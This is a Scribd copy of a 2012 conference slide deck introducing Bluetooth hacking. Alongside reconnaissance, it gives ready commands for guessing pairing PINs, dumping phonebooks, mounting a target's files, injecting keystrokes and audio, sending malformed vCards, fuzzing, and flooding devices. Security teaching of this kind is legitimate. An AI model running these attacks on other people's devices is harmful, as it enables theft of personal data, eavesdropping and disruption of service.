This document provides an introduction to Bluetooth hacking. It discusses the basics of Bluetooth including versions, topology, security features, and Linux tools. It describes techniques for scanning, spoofing profiles, discovering services, and sniffing traffic. Various attacks are covered such as pairing tricks, accessing file transfer and other services, injecting keystrokes, flooding, and fuzzing. The document demonstrates the use of tools like Ubertooth, CavitySearch, and PwnTooth to automate reconnaissance and attacks against Bluetooth targets.

Uploaded by

HaQueX
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
1K views50 pages

IntroToBluetoothHacking CarolinaCon2012

This document provides an introduction to Bluetooth hacking. It discusses the basics of Bluetooth including versions, topology, security features, and Linux tools. It describes techniques for scanning, spoofing profiles, discovering services, and sniffing traffic. Various attacks are covered such as pairing tricks, accessing file transfer and other services, injecting keystrokes, flooding, and fuzzing. The document demonstrates the use of tools like Ubertooth, CavitySearch, and PwnTooth to automate reconnaissance and attacks against Bluetooth targets.

Uploaded by

HaQueX
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 50

An Introduction to Bluetooth Hacking

JP Dunning (.ronin)
CarolinaCon 8
March 11-13, 2012

Bluetooth

IEEE 802.15.1
Released 1999
Standards controlled by Bluetooth SIG
Ideal for use in place of USB, PS/2, Serial, Audio Cables, etc.
Many of them portable or embedded
Version 1.0 first release
Low Power / Low Data Rate / Short Range
Included in Billions of Devices

Bluetooth Versions

Version   Release   Updated Features
1.0       1999      Initial release
1.1       2001      Unencrypted options
1.2       2003      FHSS, Rate 721 Kbs
2.0       2004      Rate 2.1 Mbs
2.1       2007      Improved Security
3.0       2009      AMP adds 24 Mbs rate, 802.11 transport
4.0       2010      Low Power, Redefining Protocols

Topology

Star network topology
Ad-Hoc (Piconet)
Master / Slave
Master controls the network; sets things like clock cycles
Master can have up to 7 slave devices
Slave can only have one Master
Either device can initiate pairing

Security

Authentication: Initial pairing with a PassKey; further authentication with Link Key
Encryption: Traffic encrypted during transit
Authorization: Varying levels of Trust

Linux Bluetooth Basics


BlueZ Bluetooth Stack
Recommend compiling from source with flags to install additional services

Some of the Tools:
hciconfig - Configure interface settings
hcitool - Configure connections
bluetoothd - Bluetooth Daemon
sdptool - Service discovery
simple-agent - Pairing

Equipment

Adapter: Parani UD100
Antenna: Use the same antenna equipment as Wi-Fi
ChipSet: Cambridge Silicon Radio (CSR)
Version: 2.1 (3.0 and 4.0 starting to come out)

Scanning

Scan for devices
Discoverable Mode: Device listens for remote Inquiries; a device not listening will not respond to scans

# hcitool -i hci0 scan --flush --class
    BD Address:   E0:F8:47:4D:5E:6F [mode 1, clkoffset 0x5585]
    Device name:  Bob's Laptop [cached]
    Device class: Computer, Laptop (0x3a010c)

Access Profile

Device Address: unique identifier
    Example: 00:11:22:33:44:55

Class of Device (CoD): 24-bit value
    Services: Identifies types of services
    Major Device Class: High level of device
    Minor Device Class: More granular
    Example: Motorola Headset

Device Name: Human readable identifier
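The three profile fields above are what every later tool on these slides keys on, so it helps to decode them programmatically. The following Python is an added example, not code from the talk: it splits a 24-bit CoD into major class, minor class and service bits, splits a Device Address into NAP/UAP/LAP (the two parts the Ubertooth section later needs), and parses a constructed hcitool scan --class record; the class tables cover only the Computer and Phone majors from the Bluetooth assigned numbers.

```python
import re
# Major device class (CoD bits 8-12), from the Bluetooth assigned numbers.
MAJOR = {0x00: "Miscellaneous", 0x01: "Computer", 0x02: "Phone",
         0x03: "LAN/Network Access Point", 0x04: "Audio/Video",
         0x05: "Peripheral", 0x06: "Imaging", 0x07: "Wearable",
         0x08: "Toy", 0x09: "Health", 0x1F: "Uncategorized"}
# Minor device class (bits 2-7), tabulated here for Computer and Phone only.
MINOR = {0x01: {1: "Desktop", 2: "Server", 3: "Laptop", 4: "Handheld PC/PDA",
                5: "Palm-size PC/PDA", 6: "Wearable computer"},
         0x02: {1: "Cellular", 2: "Cordless", 3: "Smartphone",
                4: "Wired modem or voice gateway", 5: "Common ISDN access"}}
# Major service classes (bits 13-23): the "Networking, Telephony, Object
# Transfer" flags the talk uses to judge what a device is good for.
SERVICE_BITS = {13: "Limited Discoverable", 16: "Positioning", 17: "Networking",
                18: "Rendering", 19: "Capturing", 20: "Object Transfer",
                21: "Audio", 22: "Telephony", 23: "Information"}

def decode_cod(cod):
    """Return (major, minor, [services]) for a 24-bit Class of Device."""
    major = (cod >> 8) & 0x1F
    minor = (cod >> 2) & 0x3F
    services = [n for b, n in sorted(SERVICE_BITS.items()) if (cod >> b) & 1]
    return (MAJOR.get(major, "Reserved 0x%02x" % major),
            MINOR.get(major, {}).get(minor, "minor 0x%02x" % minor),
            services)

def split_bdaddr(addr):
    """Split a BD_ADDR into (NAP, UAP, LAP). The LAP is what a sniffer reads
    from the sync word and the UAP is what it brute forces; NAP+UAP form the
    manufacturer prefix, which is why same-model devices cluster in a range."""
    o = addr.upper().split(":")
    return ":".join(o[:2]), o[2], ":".join(o[3:])

# Constructed sample in `hcitool scan --class` layout (not a real capture).
SCAN_OUTPUT = """Scanning ...
\tBD Address:\tE0:F8:47:4D:5E:6F [mode 1, clkoffset 0x5585]
\tDevice name:\tBob's Laptop [cached]
\tDevice class:\tComputer, Laptop (0x3a010c)
"""

def parse_scan(text):
    """Pair each BD Address in hcitool output with its address parts and class."""
    addrs = re.findall(r"BD Address:\s*([0-9A-Fa-f:]{17})", text)
    cods = [int(h, 16) for h in re.findall(r"Device class:.*\(0x([0-9A-Fa-f]+)\)", text)]
    return [(a, split_bdaddr(a), decode_cod(c)) for a, c in zip(addrs, cods)]

if __name__ == "__main__":
    for addr, parts, (major, minor, svcs) in parse_scan(SCAN_OUTPUT):
        print(addr, parts, major, minor, ", ".join(svcs))
```

The same decoder applied to the Class:0x30040 value in the Kismet record later on these slides yields major class Miscellaneous with the Positioning and Networking service bits, consistent with a GPS unit.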

Spoofing

Bluetooth Profile: Device Address, Device Class, Device Name

Bluetooth Profile Cloning: Modify host Bluetooth Adapter profile to match the profile of another device

Bluetooth Profile Spoofing: Creating a misleading profile of host Bluetooth Adapter

SpoofTooph

Scan local area for devices
Save list of devices found
Select a device from the list to clone

# spooftooph -i hci0 -s -w scan.log

War-Nibbling

Kismet has Bluetooth btscan plugin

BT Device 1: BDADDR 00:05:4F:00:00:00 Class: 0x30040 Name: StreetPilot c550 Seen: 1 Manuf: Private
  First: Thu May 10 16:07:50 2012  Last: Thu May 10 16:07:50 2012
  MinPos: Lat 35.997002 Lon 78.909752 Alt 129.585999 Spd 0.000000
  MaxPos: Lat 35.997002 Lon 78.909752 Alt 129.585999 Spd 0.000000
  AvgPos: AvgLat 35.997002 AvgLon 78.909752 AvgAlt 129.585900

Service Discovery

Service Discovery Protocol (SDP)
Lists available services on device: Service name, L2CAP port, RFCOMM port
Generally available without authentication

# sdptool -i hci0 browse xx:xx:xx:xx:xx:xx
...
Service Name: File Transfer server
Service RecHandle: 0x10000
Service Class ID List:
  "OBEX File Transfer" (0x1106)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 10
  "OBEX" (0x0008)
Profile Descriptor List:
  "OBEX File Transfer" (0x1106)
    Version: 0x0100

Port Scan

Find open ports with listening services
Similar to NMAP

psm_scan: Scan open L2CAP ports

# psm_scan -i hci0 -s 1 -e 101 xx:xx:xx:xx:xx:xx

rfcomm_scan: Scan open RFCOMM ports

# rfcomm_scan -i hci0 -s 1 -e 30 xx:xx:xx:xx:xx:xx

CavitySearch

*Tool Release*
Streamline the info gathering process
Conduct recon for HCI Info, SDP, L2CAP, and RFCOMM
Aggregate into a single log file

# cavitysearch hci0 11:22:33:44:55:66
Gathering device info into 11_22_33_44_55_66/hciinfo.log...
Gathering device scan into 11_22_33_44_55_66/scan.log...
Gathering SDP into 11_22_33_44_55_66/sdp.log...
Gathering PSMs 1-101 into 11_22_33_44_55_66/psm.log...
Gathering RFCOMMs 1-30 into 11_22_33_44_55_66/rfcomm.log...
Generating profile in 11_22_33_44_55_66/profile.log...
Logs saved in 11_22_33_44_55_66/ directory.
...done.

Bluetooth Identity
Bluetooth Class
    Type of Device; assists in determining the physical device
    Networking, Telephony, & Object Transfer
    List Services

Bluetooth Name
    Use human name for Social Engineering
    Use model name to determine possible attack vectors

Bluetooth Address
    Devices are assigned addresses in blocks
    The same models are within a limited range

Bluetooth Profiling Project


Bluetooth Profiling Project (BlueProPro)
Collect Device Name, Device Address and Device Class on as many devices as possible
Same idea as Josh Wright's Bnap, Bnap, but collecting device profiles from other people's devices instead
Collected over 1,500 device profiles so far
1,000 profiles posted as of 07/29/2010

Bluetooth Profiling Project


Percentage of device names which disclosed sensitive information (out of the 1,500 profiles collected):

First Name           28.17%
Last Name            18.76%
Location              1.30%
Device Model         70.54%
Nickname / Handle     1.51%

Sniffing
HCIDump

Similar to TCPDump to capture traffic on host

# hcidump -i hci0 -R -w btdump.cap

Wireshark

View and examine capture

# wireshark -r btdump.cap

Ubertooth
Kismet: Capture portions of Bluetooth traffic; find Bluetooth devices in local area

Bluetooth_RXTX: Find Bluetooth devices in local area; brute force UAP portion of Device Address

Spescan: Spectrum analysis

Find Non-Discoverable

Previous Contact: Have prior knowledge of the Device Address

Labels: Some devices print the Device Address on the box or casing

Redfang: Scans 2^48 (2^32) possible Device Addresses; takes years

Find Non-Discoverable

Only need LAP and UAP portions of the device address

ubertooth-lap extracts the LAP
ubertooth-uap calculates the UAP

# ubertooth-lap

# ubertooth-uap

DEMO

Pairing

Guess PassKey

Commonly PassKeys are 4 digits

Best chances: 0000, 1234, 9999

# simple-agent hci0 xx:xx:xx:xx:xx:xx
RequestPinCode (/org/bluez/2/hci0/dev_xx_xx_xx_xx_xx_xx)
Enter PIN Code:

Pairing

Trick user by changing the profile to one the user recognizes
Post signs requesting connections as advertising or local information

Pairing

Chomp

Bluetooth specification attempts to counteract brute force
Chomp attempts different PassKeys
Changes Device Address between attempts
Provide a file with possible PassKeys

# chomp xx:xx:xx:xx:xx:xx passkeys

Common Services

File Transfer Profile (FTP)
Object Push Profile (OPP)
Human Interaction Device (HID)
Hands Free (HF)
Personal Area Network (PAN)

OPP

Specific files like phonebooks and calendars

Bluebugger

Dump phonebook:
# bluebugger -c 3 -a xx:xx:xx:xx:xx:xx phonebook

Specific tools

Bluesnarfer, btxml, btobex, bloover, helomoto

FTP

FTP facilitates exchanging files

Obexfs mounts a remote folder over FTP
Interact as if the files were stored locally

# mkdir btdir
# obexfs -b xx:xx:xx:xx:xx:xx -c 3 btdir/
# ls btdir
Passwords.xls  Taxes.pdf

HID

HID is used for various types of human interaction devices such as mice and keyboards
Inject keystrokes by acting as a keyboard

Stuffkeys

Keystrokes hard coded (default)
Who controls your keystrokes?

# stuffkeys -a xx:xx:xx:xx:xx:xx -b yy:yy:yy:yy:yy:yy

HF

Inject and receive audio

Carwhisperer

# hciconfig hci0 voice 0x0060
# carwhisperer -i hci0 in.raw out.raw 4

HSTest

# hstest record in.raw xx:xx:xx:xx:xx:xx 4

PAN

Creates a TCP/IP network over Bluetooth
Interact like it is WiFi or Ethernet

# pand --connect xx:xx:xx:xx:xx:xx --persist --encrypt --role=PANU
# ifconfig
...
pan0  Link encap:Ethernet  HWaddr yy:yy:yy:yy:yy:yy
...

Fuzzing

Bluetooth Stack Smasher


Fuzz L2CAP packets
Attempts to crash Bluetooth Stack
Generates code for suspected crashes
Takes about half an hour to run

# bss -i hci0 -s 100 -m 12 -M 0 xx:xx:xx:xx:xx:xx

vCards

Virtual Business Card
Adds information to contacts

BlueJacking: Sending messages by vCard; set the name field to the message

Nasty vCard: Send a malformed vCard

# ussp-push xx:xx:xx:xx:xx:xx nasty.vcf bob.vcf

DoS

L2Ping Flood

Send a constant flood of ping packets

# l2ping -i hci0 -f xx:xx:xx:xx:xx:xx

vCard Flood

Fill up address book with contacts

# vcblaster -c 100 -g xx:xx:xx:xx:xx:xx

PwnTooth

Bundle of Bluetooth attack tools
Designed to automate multiple attacks against multiple targets
If a device address is detected in multiple iterations of scans, the attacks listed in the config file are only run the first time

# pwntooth -l logfile.txt -s 10

PwnTooth

DEMO

Recap

Setup: Configure interface
Recon: Gather information on device and services
Connect: Authenticate or connect to open services
Interact: Access resources
Attack: Test reliability through fuzzing and DoS

Q&A

JP Dunning
Twitter: r0wnin
Email: ronin <At> shadowcave <d0t> org
Web: www.hackfromacave.com
